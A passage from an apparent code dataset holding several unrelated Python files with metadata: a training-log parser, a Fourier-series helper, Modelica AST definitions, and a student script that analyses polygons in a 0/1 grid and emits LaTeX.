self.fuzzy_percentage(p.name, name)\n if perc > maximum:\n maximum = perc\n res.insert(0, p)\n else:\n res.append(p)\n return res[:s.SUGGESTION_PG_LIMIT]","sub_path":"utils/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"144820333","text":"import json\n\n#this parses the huggingface training script output to list evaluation accuracy and loss evolution over epochs,\n#collecting the row with the highest accuracy\n\ntarget_epoch = 3.0\n\n#with open(\"huggingface-train-5-epochs.txt\", \"r\") as f:\nwith open(\"firefox-hf-8-iterations.txt\", \"r\") as f:\n#with open(\"huggingface-train-3-epochs-notriage.txt\", \"r\") as f:\n#with open(\"huggingface-train-1.txt\", \"r\") as f:\n log_text = f.read()\n\niterations = 0\nbest_loss = 100\nbest_epoch = 0\nbest_accuracy = 0\nfor line in log_text.splitlines():\n if line.startswith(\"{'eval_loss':\"):\n line = line.replace(\"'\", '\"')\n line_json = json.loads(line)\n #print(line_json[\"eval_loss\"])\n epoch = float(line_json[\"epoch\"])\n eval_loss = float(line_json[\"eval_loss\"])\n accuracy = float(line_json[\"eval_accuracy\"])\n if accuracy > best_accuracy:\n best_loss = eval_loss\n best_epoch = epoch\n best_accuracy = accuracy\n if epoch == target_epoch:\n iterations += 1\n print(f\"iteration {iterations}: best_loss={best_loss}, best_epoch={best_epoch}, best_accuracy={best_accuracy}\")\n best_loss = 100\n best_accuracy = 0\n best_epoch = 0\n","sub_path":"firefox-bug-predictor/huggingface_log_parser_acc.py","file_name":"huggingface_log_parser_acc.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"631413984","text":"import numpy as np\n\n\ndef fourier_series_coefficients(f, T, N, return_complex=True, sample_rate=1000):\n r\"\"\"Calculates the first 2*N+1 Fourier series coefficients of a periodic function.\n\n Given a periodic, function f(t) with period T, this function returns the\n complex coefficients {c0,c1,c2,...}\n such that:\n\n .. math:: f(t) ~= \\sum_{k=-N}^N c_k \\cdot e^{i2 \\pi kt/T}\n\n where we define :math: `c_{-n}=\\overline{c_n}`\n\n Refer to `wikipedia `_ for the relation between the real-valued and\n complex valued coeffs.\n\n Notes\n -----\n This function was copied from\n `stackoverflow `_.\n\n Parameters\n ----------\n f : callable\n the periodic function, a callable like f(t)\n T : float\n the period of the function f, so that f(0)==f(T)\n N : int\n the function will return the first N+1 Fourier coeff.\n return_complex : bool, optional\n defaults to True\n sample_rate : int, optional\n used to tune fast Fourier transform (FFT) algorithm accuracy\n\n Returns\n -------\n ndarray\n numpy 1-dimensional complex-valued array of size N+1\n\n \"\"\"\n # From Shanon theorem we must use a sampling freq. larger than the maximum\n # frequency you want to catch in the signal. (Minimum 1000*N required for sufficient accuracy.)\n f_sample = sample_rate * N\n\n t = np.linspace(-T/2, T/2, f_sample, endpoint=False)\n\n y = np.fft.rfft(f(t)) / t.size\n\n # multiply odd terms by -1 to match SageMath\n y[1::2] *= -1\n\n # only take the number of coefficients requested\n y = y[:N + 1]\n\n if return_complex:\n return y\n else:\n y *= 2\n return y[0].real, y[1:].real, -y[1:].imag\n\n\n\n\n","sub_path":"bjsfm/fourier_series.py","file_name":"fourier_series.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"49653676","text":"#!/usr/bin/env python\n\"\"\"\nModelica AST definitions\n\"\"\"\nfrom __future__ import print_function, absolute_import, division, print_function, unicode_literals\n\nimport copy\nimport json\nfrom enum import Enum\nfrom typing import List, Union, Dict\nfrom collections import OrderedDict\n\n\nclass ClassNotFoundError(Exception):\n pass\n\n\nclass Visibility(Enum):\n PRIVATE = 0, 'private'\n PROTECTED = 1, 'protected'\n PUBLIC = 2, 'public'\n\n def __new__(cls, value, name):\n member = object.__new__(cls)\n member._value_ = value\n member.fullname = name\n return member\n\n def __int__(self):\n return self.value\n\n def __str__(self):\n return self.fullname\n\n def __lt__(self, other):\n return self.value < other.value\n\n\nnan = float('nan')\n\n\"\"\"\nAST Node Type Hierarchy\n\nRoot Class\n Class\n Equation\n ComponentRef\n Expression\n Primary\n IfEquation\n Expression\n Equation\n ForEquation\n Expression\n Equation\n ConnectClause\n ComponentRef\n Symbol\n\"\"\"\n\n\nclass Node(object):\n def __init__(self, **kwargs):\n self.set_args(**kwargs)\n\n def set_args(self, **kwargs):\n for key in kwargs.keys():\n if key not in self.__dict__.keys():\n raise KeyError('{:s} not valid arg'.format(key))\n self.__dict__[key] = kwargs[key]\n\n def __repr__(self):\n return json.dumps(self.to_json(self), indent=2, sort_keys=True)\n\n @classmethod\n def to_json(cls, var):\n if isinstance(var, list):\n res = [cls.to_json(item) for item in var]\n elif isinstance(var, dict):\n res = {key: cls.to_json(var[key]) for key in var.keys()}\n elif isinstance(var, Node):\n res = {key: cls.to_json(var.__dict__[key]) for key in var.__dict__.keys()}\n elif isinstance(var, Visibility):\n res = str(var)\n else:\n res = var\n return res\n\n __str__ = __repr__\n\n\nclass Primary(Node):\n def __init__(self, **kwargs):\n self.value = None # type: Union[bool, float, int, str, type(None)]\n super().__init__(**kwargs)\n\n\nclass Array(Node):\n def __init__(self, **kwargs):\n self.values = [] # type: List[Union[Expression, Primary, ComponentRef, Array]]\n super().__init__(**kwargs)\n\n\nclass Slice(Node):\n def __init__(self, **kwargs):\n self.start = Primary(value=0) # type: Union[Expression, Primary, ComponentRef]\n self.stop = Primary(value=-1) # type: Union[Expression, Primary, ComponentRef]\n self.step = Primary(value=1) # type: Union[Expression, Primary, ComponentRef]\n super().__init__(**kwargs)\n\n\nclass ComponentRef(Node):\n def __init__(self, **kwargs):\n self.name = '' # type: str\n self.indices = [] # type: List[Union[Expression, Slice, Primary, ComponentRef]]\n self.child = [] # type: List[ComponentRef]\n super().__init__(**kwargs)\n\n def __str__(self) -> str:\n return \".\".join(self.to_tuple())\n\n def to_tuple(self) -> tuple:\n \"\"\"\n Convert the nested component reference to flat tuple of names, which is\n hashable and can therefore be used as dictionary key. Note that this\n function ignores any array indices in the component reference.\n :return: flattened tuple of c's names\n \"\"\"\n\n if self.child:\n return (self.name, ) + self.child[0].to_tuple()\n else:\n return (self.name, )\n\n @classmethod\n def from_tuple(cls, components: tuple) -> 'ComponentRef':\n \"\"\"\n Convert the tuple pointing to a component to\n a component reference.\n :param components: tuple of components name\n :return: ComponentRef\n \"\"\"\n\n component_ref = ComponentRef(name=components[0], child=[])\n c = component_ref\n for component in components[1:]:\n c.child.append(ComponentRef(name=component, child=[]))\n c = c.child[0]\n return component_ref\n\n @classmethod\n def from_string(cls, s: str) -> 'ComponentRef':\n \"\"\"\n Convert the string pointing to a component using dot notation to\n a component reference.\n :param s: string pointing to component using dot notation\n :return: ComponentRef\n \"\"\"\n\n components = s.split('.')\n return cls.from_tuple(components)\n\n @classmethod\n def concatenate(cls, *args: List['ComponentRef']) -> 'ComponentRef':\n \"\"\"\n Helper function to append two component references to eachother, e.g.\n a \"within\" component ref and an \"object type\" component ref.\n :param a:\n :param b:\n :return: New component reference, with other appended to self.\n \"\"\"\n\n a = copy.deepcopy(args[0])\n n = a\n for b in args[1:]:\n while n.child:\n n = n.child[0]\n b = copy.deepcopy(b) # Not strictly necessary\n n.child = [b]\n return a\n\n\nclass Expression(Node):\n def __init__(self, **kwargs):\n self.operator = None # type: Union[str, ComponentRef]\n self.operands = [] # type: List[Union[Expression, Primary, ComponentRef, Array, IfExpression]]\n super().__init__(**kwargs)\n\n\nclass IfExpression(Node):\n def __init__(self, **kwargs):\n self.conditions = [] # type: List[Union[Expression, Primary, ComponentRef, Array, IfExpression]]\n self.expressions = [] # type: List[Union[Expression, Primary, ComponentRef, Array, IfExpression]]\n super().__init__(**kwargs)\n\n\nclass Equation(Node):\n def __init__(self, **kwargs):\n self.left = None # type: Union[Expression, Primary, ComponentRef, List[Union[Expression, Primary, ComponentRef]]]\n self.right = None # type: Union[Expression, Primary, ComponentRef, List[Union[Expression, Primary, ComponentRef]]]\n self.comment = '' # type: str\n super().__init__(**kwargs)\n\n\nclass IfEquation(Node):\n def __init__(self, **kwargs):\n self.conditions = [] # type: List[Union[Expression, Primary, ComponentRef]]\n self.equations = [] # type: List[Union[Expression, ForEquation, ConnectClause, IfEquation]]\n self.comment = '' # type: str\n super().__init__(**kwargs)\n\n\nclass ForIndex(Node):\n def __init__(self, **kwargs):\n self.name = '' # type: str\n self.expression = None # type: Union[Expression, Primary, Slice]\n super().__init__(**kwargs)\n\n\nclass ForEquation(Node):\n def __init__(self, **kwargs):\n self.indices = [] # type: List[ForIndex]\n self.equations = [] # type: List[Union[Equation, ForEquation, ConnectClause]]\n self.comment = None # type: str\n super().__init__(**kwargs)\n\n\nclass ConnectClause(Node):\n def __init__(self, **kwargs):\n self.left = ComponentRef() # type: ComponentRef\n self.right = ComponentRef() # type: ComponentRef\n self.comment = '' # type: str\n super().__init__(**kwargs)\n\n\nclass AssignmentStatement(Node):\n def __init__(self, **kwargs):\n self.left = [] # type: List[ComponentRef]\n self.right = None # type: Union[Expression, IfExpression, Primary, ComponentRef]\n self.comment = '' # type: str\n super().__init__(**kwargs)\n\n\nclass IfStatement(Node):\n def __init__(self, **kwargs):\n self.conditions = [] # type: List[Union[Expression, Primary, ComponentRef]]\n self.statements = [] # type: List[Union[AssignmentStatement, IfStatement, ForStatement]]\n self.comment = '' # type: str\n super().__init__(**kwargs)\n\n\nclass ForStatement(Node):\n def __init__(self, **kwargs):\n self.indices = [] # type: List[ForIndex]\n self.statements = [] # type: List[Union[AssignmentStatement, IfStatement, ForStatement]]\n self.comment = '' # type: str\n super().__init__(**kwargs)\n\n\nclass Symbol(Node):\n \"\"\"\n A mathematical variable or state of the model\n \"\"\"\n ATTRIBUTES = ['value', 'min', 'max', 'start', 'fixed', 'nominal']\n\n def __init__(self, **kwargs):\n self.name = '' # type: str\n self.type = ComponentRef() # type: ComponentRef\n self.prefixes = [] # type: List[str]\n self.redeclare = False # type: bool\n self.final = False # type: bool\n self.inner = False # type: bool\n self.outer = False # type: bool\n self.dimensions = [Primary(value=1)] # type: List[Union[Expression, Primary, ComponentRef]]\n self.comment = '' # type: str\n # params start value is 0 by default from Modelica spec\n self.start = Primary(value=0) # type: Union[Expression, Primary, ComponentRef, Array]\n self.min = Primary(value=None) # type: Union[Expression, Primary, ComponentRef, Array]\n self.max = Primary(value=None) # type: Union[Expression, Primary, ComponentRef, Array]\n self.nominal = Primary(value=None) # type: Union[Expression, Primary, ComponentRef, Array]\n self.value = Primary(value=None) # type: Union[Expression, Primary, ComponentRef, Array]\n self.fixed = Primary(value=False) # type: Primary\n self.id = 0 # type: int\n self.order = 0 # type: int\n self.visibility = Visibility.PRIVATE # type: Visibility\n self.class_modification = None # type: ClassModification\n super().__init__(**kwargs)\n\n\nclass ComponentClause(Node):\n def __init__(self, **kwargs):\n self.prefixes = [] # type: List[str]\n self.type = ComponentRef() # type: ComponentRef\n self.dimensions = [Primary(value=1)] # type: List[Union[Expression, Primary, ComponentRef]]\n self.comment = [] # type: List[str]\n self.symbol_list = [] # type: List[Symbol]\n super().__init__(**kwargs)\n\n\nclass EquationSection(Node):\n def __init__(self, **kwargs):\n self.initial = False # type: bool\n self.equations = [] # type: List[Union[Equation, IfEquation, ForEquation, ConnectClause]]\n super().__init__(**kwargs)\n\n\nclass AlgorithmSection(Node):\n def __init__(self, **kwargs):\n self.initial = False # type: bool\n self.statements = [] # type: List[Union[AssignmentStatement, IfStatement, ForStatement]]\n super().__init__(**kwargs)\n\n\nclass ImportAsClause(Node):\n def __init__(self, **kwargs):\n self.component = ComponentRef() # type: ComponentRef\n self.name = '' # type: str\n super().__init__(**kwargs)\n\n\nclass ImportFromClause(Node):\n def __init__(self, **kwargs):\n self.component = ComponentRef() # type: ComponentRef\n self.symbols = [] # type: List[str]\n super().__init__(**kwargs)\n\n\nclass ElementModification(Node):\n # TODO: Check if ComponentRef modifiers are handled correctly. For example,\n # check HomotopicLinear which extends PartialHomotopic with the modifier\n # \"H(min = H_b)\".\n def __init__(self, **kwargs):\n self.component = ComponentRef() # type: Union[ComponentRef]\n self.modifications = [] # type: List[Union[Primary, Expression, ClassModification, Array, ComponentRef]]\n super().__init__(**kwargs)\n\n\nclass ShortClassDefinition(Node):\n def __init__(self, **kwargs):\n self.name = '' # type: str\n self.type = '' # type: str\n self.component = ComponentRef() # type: ComponentRef\n self.class_modification = ClassModification() # type: ClassModification\n super().__init__(**kwargs)\n\n\nclass ElementReplaceable(Node):\n def __init__(self, **kwargs):\n # TODO, add fields ?\n super().__init__(**kwargs)\n\n\nclass ClassModification(Node):\n def __init__(self, **kwargs):\n self.arguments = [] # type: List[Union[ElementModification, ComponentClause, ShortClassDefinition]]\n super().__init__(**kwargs)\n\n\nclass ExtendsClause(Node):\n def __init__(self, **kwargs):\n self.component = None # type: ComponentRef\n self.class_modification = None # type: ClassModification\n self.visibility = Visibility.PRIVATE # type: Visibility\n super().__init__(**kwargs)\n\n\nclass Class(Node):\n def __init__(self, **kwargs):\n self.name = None # type: str\n self.imports = [] # type: List[Union[ImportAsClause, ImportFromClause]]\n self.extends = [] # type: List[ExtendsClause]\n self.encapsulated = False # type: bool\n self.partial = False # type: bool\n self.final = False # type: bool\n self.type = '' # type: str\n self.comment = '' # type: str\n self.classes = OrderedDict() # type: OrderedDict[str, Class]\n self.symbols = OrderedDict() # type: OrderedDict[str, Symbol]\n self.functions = OrderedDict() # type: OrderedDict[str, Class]\n self.initial_equations = [] # type: List[Union[Equation, ForEquation]]\n self.equations = [] # type: List[Union[Equation, ForEquation, ConnectClause]]\n self.initial_statements = [] # type: List[Union[AssignmentStatement, IfStatement, ForStatement]]\n self.statements = [] # type: List[Union[AssignmentStatement, IfStatement, ForStatement]]\n self.within = [] # type: List[ComponentRef]\n super().__init__(**kwargs)\n\n\nclass File(Node):\n \"\"\"\n Represents a .mo file for use in pre-processing before flattening to a single class.\n \"\"\"\n\n def __init__(self, **kwargs):\n self.within = [] # type: List[ComponentRef]\n self.classes = OrderedDict() # type: OrderedDict[str, Class]\n super().__init__(**kwargs)\n\n\nclass Collection(Node):\n \"\"\"\n A list of modelica files, used in pre-processing packages etc. before flattening\n to a single class.\n \"\"\"\n\n def __init__(self, **kwargs):\n self.files = [] # type: List[File]\n super().__init__(**kwargs)\n\n # TODO: Should be directly build the class_lookup, or wait until the first call to find_class?\n self._class_lookup = None\n\n def _build_class_lookup_for_class(self, c, within):\n if within:\n full_name = ComponentRef.concatenate(within, ComponentRef(name=c.name))\n else:\n full_name = ComponentRef(name=c.name)\n\n # FIXME: Do we have to convert to string?\n self._class_lookup[full_name.to_tuple()] = c\n\n if within:\n within = ComponentRef.concatenate(within, ComponentRef(name=c.name))\n else:\n within = ComponentRef(name=c.name)\n for nested_c in c.classes.values():\n self._build_class_lookup_for_class(nested_c, within)\n\n def _build_class_lookup(self):\n self._class_lookup = {}\n\n for f in self.files:\n within = f.within[0] if f.within else None\n for c in f.classes.values():\n self._build_class_lookup_for_class(c, within)\n\n def extend(self, other):\n self.files.extend(other.files)\n\n def find_class(self, component_ref: ComponentRef, within: list = None, check_builtin_classes=False, return_ref=False):\n if check_builtin_classes:\n if component_ref.name in [\"Real\", \"Integer\", \"String\", \"Boolean\"]:\n c = Class(name=component_ref.name)\n c.type = \"__builtin\"\n\n cref = ComponentRef(name=component_ref.name)\n s = Symbol(name=\"__value\", type=cref)\n c.symbols[s.name] = s\n\n if return_ref:\n return c, cref\n else:\n return c\n\n if self._class_lookup is None:\n self._build_class_lookup()\n\n # TODO: Support lookups starting with a dot. These are lookups in the root node (i.e. within not used).\n # Odds are that these types of lookups are not parsed yet. We would expet an empty first name, with a non-empty child.\n\n # Lookup the referenced class, walking up the tree from the current\n # node until the root node.\n c = None\n\n if within:\n within_tuple = within[0].to_tuple()\n else:\n within_tuple = tuple()\n\n cref_tuple = component_ref.to_tuple()\n\n prev_tuple = None\n\n while c is None:\n c = self._class_lookup.get(within_tuple + cref_tuple, None)\n\n prev_tuple = within_tuple + cref_tuple\n\n if within_tuple:\n within_tuple = within_tuple[:-1]\n else:\n # Finished traversing up the tree all the way to the root. No\n # more lookups possible.\n break\n\n if c is None:\n # Class not found\n if component_ref.name in (\"Real\", \"Integer\", \"Boolean\", \"String\", \"Modelica\", \"SI\"):\n # FIXME: To support an \"ignore\" in the flattener, we raise a\n # KeyError for what are likely to be elementary types\n raise KeyError\n else:\n raise ClassNotFoundError(\"Could not find class {}\".format(component_ref))\n\n if return_ref:\n return c, ComponentRef.from_tuple(prev_tuple)\n else:\n return c\n\n def find_symbol(self, node, component_ref: ComponentRef) -> Symbol:\n sym = node.symbols[component_ref.name]\n if len(component_ref.child) > 0:\n node = self.find_class(sym.type)\n return self.find_symbol(node, component_ref.child[0])\n else:\n return sym\n","sub_path":"pymola/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":17353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"518484378","text":"# Written by Peter Leonard for COMP9021 \n# Assignment 2 17s1\n\n# Input:\n# The input is expected to consist of ydim lines of xdim 0’s and 1’s,\n# where xdim and ydim are at least equal to 2 and at most equal to 50,\n# with possibly lines consisting of spaces only that will be ignored and with possibly spaces anywhere on the lines with digits.\n# If n is the xth digit of the yth line with digits, with 0 ≤ x < xdim and 0 ≤ y < ydim,\n# then n is to be associated with a point situated x×0.4 cm to the right and y×0.4 cm below an origin.\n\nfrom argparse import ArgumentParser\nfrom re import sub\nfrom statistics import mean\nfrom itertools import count\nfrom math import ceil\nimport os\nimport sys\n\nimport operator\n\n# length in cm\nlength = 0.4\n\n# display grid (for testing purpose)\ndef display_grid():\n for i in range(y_dim):\n print(' ', end = '')\n for j in range(x_dim):\n print(f' {grid[i][j]}', end = '') if grid[i][j] else print(' 0', end = '')\n print()\n print()\n\ndef display_dirgrid():\n for i in range(y_dim):\n print(' ', end = '')\n for j in range(x_dim):\n print(f' {dir_grid[i][j]}', end = '') if grid[i][j] else print(' 0', end = '')\n print()\n print()\n\n# direction list\ndir_list = ['N','NE','E','SE','S','SW','W','NW']\n\ndef get_nextDirection(current_direction):\n if current_direction == 'NW':\n next_direction = dir_list[0]\n else:\n next_direction = dir_list[dir_list.index(current_direction) + 1]\n\n return next_direction\n\ndef get_ij_from_direction(direction, i, j):\n if i and direction == 'N':\n i = i - 1\n j = j\n elif i and j < x_dim - 1 and direction == 'NE':\n i = i - 1\n j = j + 1\n elif j < x_dim - 1 and direction == 'E':\n i = i\n j = j + 1\n elif i < y_dim - 1 and j < x_dim - 1 and direction == 'SE':\n i = i + 1\n j = j + 1\n elif i < y_dim - 1 and direction == 'S':\n i = i + 1\n j = j\n elif i < y_dim - 1 and j and direction == 'SW':\n i = i + 1\n j = j - 1\n elif j and direction == 'W':\n i = i\n j = j - 1\n elif i and j and direction == 'NW':\n i = i - 1\n j = j - 1\n else:\n return -1, -1\n\n return i, j\n\ndef get_direction(direction):\n original_direction = get_nextDirection(direction)\n original_direction = get_nextDirection(original_direction)\n original_direction = get_nextDirection(original_direction)\n original_direction = get_nextDirection(original_direction)\n \n next_direction = get_nextDirection(direction)\n next_direction = get_nextDirection(next_direction)\n next_direction = get_nextDirection(next_direction)\n next_direction = get_nextDirection(next_direction)\n next_direction = get_nextDirection(next_direction)\n\n return original_direction, next_direction\n \ndef clear_visited_grid():\n for i in range(y_dim):\n for j in range(x_dim):\n visited[i][j] = False\n\ndef colour_polygons():\n colour = 2\n for i in range(y_dim):\n for j in range(x_dim):\n if grid[i][j] == 1:\n # initiate variable\n start_i = i\n start_j = j\n direction = 'SE'\n axis = 0\n perimeter_axis[colour] = 0\n perimeter_diagonal[colour] = 0\n area[colour] = 0\n convex[colour] = True\n\n clear_visited_grid()\n colour_ij(start_i, start_j, i, j, direction, colour)\n perimeter_axis[colour] *= length\n area[colour] = abs(area[colour]) * (length**2) / 2\n colour += 1\n return colour\n\ndef get_perimeter(next_direction, colour):\n if next_direction == 'N' or next_direction == 'E' or next_direction == 'S' or next_direction == 'W':\n perimeter_axis[colour] += 1\n else:\n perimeter_diagonal[colour] += 1\n\ndef get_area(i, j, next_i, next_j, colour):\n area[colour] += (i * next_j) - (j * next_i)\n\ndef is_convex(original_direction, next_direction, colour):\n if next_direction == (get_nextDirection(original_direction)) or next_direction == (get_nextDirection(get_nextDirection(original_direction))) or next_direction == get_nextDirection(get_nextDirection(get_nextDirection(original_direction))):\n convex[colour] = False\n \ndef colour_ij(start_i, start_j, i, j, direction, colour):\n grid[i][j] = colour\n visited[i][j] = True\n \n original_direction, next_direction = get_direction(direction)\n next_i, next_j = get_ij_from_direction(next_direction, i, j)\n\n for _ in range(7):\n # base case\n if start_i == next_i and start_j == next_j:\n dir_grid[i][j] = next_direction\n get_perimeter(next_direction, colour)\n get_area(i, j, next_i, next_j, colour)\n is_convex(original_direction, next_direction, colour)\n return True\n\n # if not valid get next direction\n if (next_i == -1 and next_j == -1) or (grid[next_i][next_j] != 1) or (visited[next_i][next_j]):\n next_direction = get_nextDirection(next_direction)\n next_i, next_j = get_ij_from_direction(next_direction, i, j)\n continue\n \n if colour_ij(start_i, start_j, next_i, next_j, next_direction, colour):\n dir_grid[i][j] = next_direction\n get_perimeter(next_direction, colour)\n get_area(i, j, next_i, next_j, colour)\n if not (start_i == i and start_j == j):\n is_convex(original_direction, next_direction, colour)\n return True\n\n # if colour_ij false, get next direction\n next_direction = get_nextDirection(next_direction)\n next_i, next_j = get_ij_from_direction(next_direction, i, j)\n\n # backtracking\n grid[i][j] = 1\n return False\n\n# check for validity (non 1's after colouring)\ndef check_validity():\n for i in range(y_dim):\n for j in range(x_dim):\n if grid[i][j] == 1:\n print('Incorrect input.')\n sys.exit()\n\n# print result function\ndef print_result():\n for i in range(2,nb_of_polygons):\n print(f'Polygon {i-1}:')\n if perimeter_diagonal[i] == 0:\n print(f' Perimeter: {perimeter_axis[i]:.1f}')\n else:\n print(f' Perimeter: {perimeter_axis[i]:.1f} + {perimeter_diagonal[i]}*sqrt(.32)')\n print(f' Area: {area[i]:.2f}')\n if convex[i]:\n print(f' Convex: yes')\n else:\n print(f' Convex: no')\n print(f' Nb of invariant rotations: {rotations[i]}')\n print(f' Depth: {depth[i]}')\n\ndef get_rotations():\n for colour in range(2, nb_of_polygons):\n # by default 1 rotation exists\n rotations[colour] = 1\n stop = False\n for i in range(y_dim):\n if stop:\n break\n for j in range(x_dim):\n if stop:\n break\n if grid[i][j] == colour:\n start_i = i\n start_j = j\n direction = dir_grid[start_i][start_j]\n next_i, next_j = get_ij_from_direction(direction, start_i, start_j)\n while True:\n if next_i == i and next_j == j:\n break\n complete = True\n if dir_grid[start_i][start_j] != dir_grid[next_i][next_j]:\n if len(dir_grid[start_i][start_j]) == len(dir_grid[next_i][next_j]):\n # start looping to check\n temp_dir = dir_grid[start_i][start_j]\n current_i, current_j = get_ij_from_direction(temp_dir, start_i, start_j)\n next_temp_dir = dir_grid[next_i][next_j]\n next_next_i, next_next_j = get_ij_from_direction(next_temp_dir,next_i, next_j)\n while True:\n if current_i == start_i and current_j == start_j:\n break\n if len(dir_grid[current_i][current_j]) != len(dir_grid[next_next_i][next_next_j]):\n complete = False\n break\n temp_dir = dir_grid[current_i][current_j]\n next_temp_dir = dir_grid[next_next_i][next_next_j]\n current_i, current_j = get_ij_from_direction(temp_dir, current_i, current_j)\n next_next_i, next_next_j = get_ij_from_direction(next_temp_dir, next_next_i, next_next_j)\n if complete:\n start_i = next_i\n start_j = next_j\n rotations[colour] += 1\n direction = dir_grid[next_i][next_j]\n next_i, next_j = get_ij_from_direction(direction, next_i, next_j)\n stop = True\ndef check_top(i, j, in_top, colour):\n if j:\n if dir_grid[i-1][j-1] == 'SE' and grid[i-1][j-1] == colour:\n in_top = 1\n if dir_grid[i-1][j] == 'S' and grid[i-1][j] == colour:\n in_top = 1\n if dir_grid[i-1][j+1] == 'SW' and grid[i-1][j+1] == colour:\n in_top = 1\n return in_top\n\ndef check_bottom(i, j, in_bottom, colour):\n if j:\n if dir_grid[i+1][j-1] == 'NE' and grid[i+1][j-1] == colour:\n in_bottom = 1\n if dir_grid[i+1][j] == 'N' and grid[i+1][j] == colour:\n in_bottom = 1\n if dir_grid[i+1][j+1] == 'NW' and grid[i+1][j+1] == colour:\n in_bottom = 1\n return in_bottom\n\ndef check_mid(i, j, in_top, in_bottom, cross):\n if in_top:\n if 'S' in dir_grid[i][j]:\n cross += 1\n in_top = 0\n else:\n in_top = 0\n if in_bottom:\n if 'N' in dir_grid[i][j]:\n cross += 1\n in_bottom = 0\n else:\n in_bottom = 0\n return cross, in_top, in_bottom\n\ndef get_depth():\n # first polygon always have 0 depth (outermost so to say)\n depth[2] = 0\n for colour in range(3, nb_of_polygons):\n # initiate depth for colour\n depth[colour] = 0\n in_top = 0\n in_bottom = 0\n stop = False\n for i in range(y_dim):\n if stop:\n break\n for j in range(x_dim):\n if stop:\n break\n if grid[i][j] == colour:\n for outer_layer in range(2, colour):\n start_i = i\n start_j = j\n cross = 0\n while (start_j):\n start_j -= 1\n if grid[start_i][start_j] == outer_layer:\n if start_i:\n in_top = check_top(start_i, start_j, in_top, outer_layer)\n if start_i < y_dim - 1:\n in_bottom = check_bottom(start_i, start_j, in_bottom, outer_layer)\n cross, in_top, in_bottom = check_mid(start_i, start_j, in_top, in_bottom, cross)\n if cross % 2 == 1:\n depth[colour] += 1\n stop = True\n\ndef get_coordinate():\n for colour in range(2, nb_of_polygons):\n coordinates[colour] = []\n stop = False\n for i in range(y_dim):\n if stop:\n break\n for j in range(x_dim):\n if stop:\n break\n if grid[i][j] == colour:\n coordinates[colour] = [(j, i)]\n start_i = i\n start_j = j\n direction = dir_grid[start_i][start_j]\n next_i, next_j = get_ij_from_direction(direction, start_i, start_j)\n while True:\n if next_i == i and next_j == j:\n break\n if dir_grid[start_i][start_j] != dir_grid[next_i][next_j]:\n coordinates[colour] += [(next_j, next_i)]\n start_i = next_i\n start_j = next_j\n direction = dir_grid[next_i][next_j]\n next_i, next_j = get_ij_from_direction(direction, next_i, next_j)\n stop = True\n\n \ndef output_tex():\n tex_filename = sub('\\..*$', '', filename) + '_output.tex'\n max_area = max(area.values())\n min_area = min(area.values())\n max_depth = max(depth.values())\n with open(tex_filename, 'w') as tex_file:\n print('\\\\documentclass[10pt]{article}\\n'\n '\\\\usepackage{tikz}\\n'\n '\\\\usepackage[margin=0cm]{geometry}\\n'\n '\\\\pagestyle{empty}\\n'\n '\\n'\n '\\\\begin{document}\\n'\n '\\n'\n '\\\\vspace*{\\\\fill}\\n'\n '\\\\begin{center}\\n'\n '\\\\begin{tikzpicture}[x=0.4cm, y=-0.4cm, thick, brown]', file = tex_file)\n print(f'\\\\draw[ultra thick] (0, 0) -- ({x_dim - 1}, 0) -- ({x_dim - 1}, {y_dim - 1}) -- (0, {y_dim - 1}) -- cycle;', file = tex_file)\n for i in range(max_depth + 1):\n print(f'%Depth {i}', file = tex_file)\n for x in range(2, nb_of_polygons):\n if depth[x] == i:\n colour = round((max_area - area[x]) / (max_area - min_area) * 100)\n print(f'\\\\filldraw[fill=orange!{colour}!yellow]', end = ' ', file = tex_file)\n for y in coordinates[x]:\n print(f'{y} --', end = ' ', file = tex_file)\n print('cycle;', file = tex_file)\n print('\\\\end{tikzpicture}\\n'\n '\\\\end{center}\\n'\n '\\\\vspace*{\\\\fill}\\n'\n '\\n'\n '\\\\end{document}', file = tex_file)\n\n return tex_filename\n\nparser = ArgumentParser()\nparser.add_argument('-print', dest = 'print_tex', action= 'store_true')\nparser.add_argument('--file', dest = 'filename', required = True)\nargs = parser.parse_args()\n\nfilename = args.filename\nprint_tex = args.print_tex\ntry:\n read_list = []\n with open(filename) as file:\n for line_no,line in enumerate(file):\n line = line.strip('\\n')\n line = line.replace(\" \", \"\")\n if line != '':\n read_list += [line]\n\n # getting x dim and y dim\n x_dim = len(read_list[0])\n y_dim = len(read_list)\n\n # check for incorrect input\n incorrect_input = False\n if x_dim > 50 or y_dim > 50 or x_dim < 2 or y_dim < 2:\n incorrect_input = True\n\n for i in range(0, len(read_list)):\n for x in range(0, len(read_list[i])):\n if int(read_list[i][x]) < 0 or int(read_list[i][x]) > 1:\n incorrect_input = True\n break\n\n if incorrect_input:\n print('Incorrect input.')\n sys.exit()\n\nexcept FileNotFoundError:\n print(f'File {filename} could not be found.')\n\n\n# creating grid\ngrid = [[0 for _ in range(x_dim)] for _ in range(y_dim)]\nvisited = [[None for _ in range(x_dim)] for _ in range(y_dim)]\ndir_grid = [[None for _ in range(x_dim)] for _ in range(y_dim)]\n\nfor i in range(y_dim):\n for j in range(x_dim):\n grid[i][j] = int(read_list[i][j])\n\n# initiate dictionary for each answer\nperimeter_axis = {}\nperimeter_diagonal = {}\narea = {}\nconvex = {}\nrotations = {}\ndepth = {}\ncoordinates = {}\n\n# colour polygons\nnb_of_polygons = colour_polygons()\n# check validity\ncheck_validity()\n\n# get invariant rotations and depth\nget_rotations()\nget_depth()\nget_coordinate()\n\ndisplay_grid()\ndisplay_dirgrid()\n# print the calculation\nprint_result()\n\n# output -print\nif print_tex:\n tex_filename = output_tex()\n os.system('pdflatex ' + tex_filename)\n\n\n","sub_path":"Data/v2.py","file_name":"v2.py","file_ext":"py","file_size_in_byte":16052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"406924194","text":"# -*- coding: utf-8 -*\n\n# -------------------------------------------------------------------------------\n# Author: LiuNing\n# Contact: 2742229056@qq.com\n# Software: PyCharm\n# File: finetune_triplet.py\n# Time: 